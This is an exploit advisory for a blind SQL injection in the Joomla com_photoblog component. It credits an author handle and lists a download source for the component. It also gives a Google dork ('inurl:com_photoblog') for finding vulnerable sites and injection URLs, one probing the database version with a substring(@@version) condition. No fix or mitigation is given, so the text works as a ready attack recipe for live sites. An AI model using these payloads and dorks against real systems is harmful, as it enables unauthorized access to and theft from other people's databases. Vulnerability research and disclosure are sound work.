23 lines
No EOL
930 B
Text
23 lines
No EOL
930 B
Text
Joomla (com_photoblog) Blind Sql Injection Vulnerability
|
|
========================================================
|
|
|
|
####################################################################
|
|
.:. Author : ALTBTA [L_9@HoTmIL.CoM]
|
|
.:. Home : v4-team.com/cc<http://v4-team.com/cc>
|
|
.:. Script : Joomla
|
|
.:. Download Script: http://webguerilla.net/downloads/3-components-for-joomla-1
|
|
.:. Bug Type : Blind Sql Injection
|
|
.:. Dork : inurl:"com_photoblog"
|
|
|
|
####################################################################
|
|
|
|
===[ Exploit ]===
|
|
|
|
www.site.com/detail.php?id=[Blind<http://www.site.com/detail.php?id=[Blind> SQL INJECTION]
|
|
|
|
|
|
www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and<http://www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and> substring(@@version,1,1)=5
|
|
|
|
####################################################################
|
|
|
|
Greats T0: aB0-3tH4b T3rR0r & RxH |